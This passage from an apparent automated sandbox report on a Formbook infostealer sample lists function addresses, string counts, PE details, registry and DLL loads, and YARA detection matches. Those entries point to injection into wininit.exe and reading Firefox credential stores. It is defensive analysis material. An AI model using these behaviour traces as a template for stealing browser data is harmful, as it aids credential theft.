      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAF29EE1_2_1EAF29EE
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAD47361_2_1EAD4736
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EB024E11_2_1EB024E1
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAA44FC1_2_1EAA44FC
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EACE4D71_2_1EACE4D7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_009350A5
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0093B0E7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C7015
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00877078
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008991F7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00893109
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008D72C3
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008783EB
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0089E4D7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008D24E1
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008744FC
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00940404
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0089C447
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C645A
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008CB594
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00936500
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008A36AC
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008896B9
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C77C8
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_009378EA
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00944990
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00893984
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C29EE
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00931907
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C595C
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008E3951
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C2ADC
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C9A68
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0091DB95
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0087CBA7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00934BBA
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008DFBA6
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00890BFB
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008D5CCD
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0089DCFB
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00935C56
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008DFC46
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C5DD8
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0091DD51
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0088EEC7
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00880E52
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_00879F90
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_008C7FAB
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0089DFD4
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0007D7BE
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0007C944
      Source: C:\Windows\System32\wininit.exe | Code function: 4_2_0007CC6B
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000FF944
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000FFC6B
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000E5D87
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000E5D90
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000ECF5B
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000ECF60
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_001007BE
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 7_2_000E5FB0
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD7FAB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB89F90
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBF1FDB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBADFD4
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBADCFB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBE5CCD
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC45C56
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBEFC46
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD5DD8
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC2DD51
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD9A68
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBEFBA6
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC2DB95
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC478EA
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBA3984
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC41907
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBFB974
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD595C
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBF3951
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB996B9
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB36AC
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD77C8
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBDB594
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBA153A
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBE72C3
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB8F202
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC4B0E7
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC450A5
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB30CF
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD7015
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB87078
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBA91F7
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBA3109
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBFAEF5
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB9EEC7
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB90E52
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB2CAF
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC2ADC5
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD2ADC
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB8CBA7
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBA0BFB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC44BBA
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB28A3
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC2C889
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD29EE
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC54990
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB4736
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB844FC
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBE24E1
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBAE4D7
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC50404
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBD645A
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBAC447
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB25CB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC46500
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EC42250
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EB883EB
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: 10_2_1EBB20EA
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EB9F63B appears 249 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EBB3D00 appears 41 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EC1F3E2 appears 83 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EBD2F3C appears 34 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EBD2824 appears 109 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EBC72D0 appears 34 times
      Source: C:\Program Files\A_hh\gdiddfh.exe | Code function: String function: 1EBA1ACE appears 132 times
      Source: C:\Windows\System32\wininit.exe | Code function: String function: 008A3D00 appears 41 times
      Source: C:\Windows\System32\wininit.exe | Code function: String function: 008C2824 appears 73 times
      Source: C:\Windows\System32\wininit.exe | Code function: String function: 0088F63B appears 237 times
      Source: C:\Windows\System32\wininit.exe | Code function: String function: 00891ACE appears 101 times
      Source: C:\Windows\System32\wininit.exe | Code function: String function: 0090F3E2 appears 82 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EABF63B appears 193 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EAE72D0 appears 31 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EAC1ACE appears 99 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EB3F3E2 appears 71 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EAD3D00 appears 58 times
      Source: C:\Users\user\Desktop\tilmelding.exe | Code function: String function: 1EAF2824 appears 90 times
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: String function: 000FDFD0 appears 31 times
      Source: tilmelding.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: gdiddfh.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: gdiddfh.exe0.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: tilmelding.exe, 00000000.00000002.915860603.001E0000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.970730079.00690000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenamewship6.dll.muij% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.973638626.1ECC4000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.970717305.00670000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs tilmelding.exe
      Source: tilmelding.exe, 00000001.00000002.972913794.1DA00000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameWinInit.exej% vs tilmelding.exe
      Source: C:\Windows\System32\wininit.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
      Source: C:\Windows\System32\wininit.exe | Section loaded: mozglue.dll
      Source: C:\Windows\System32\wininit.exe | Section loaded: winsqlite3.dll
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-si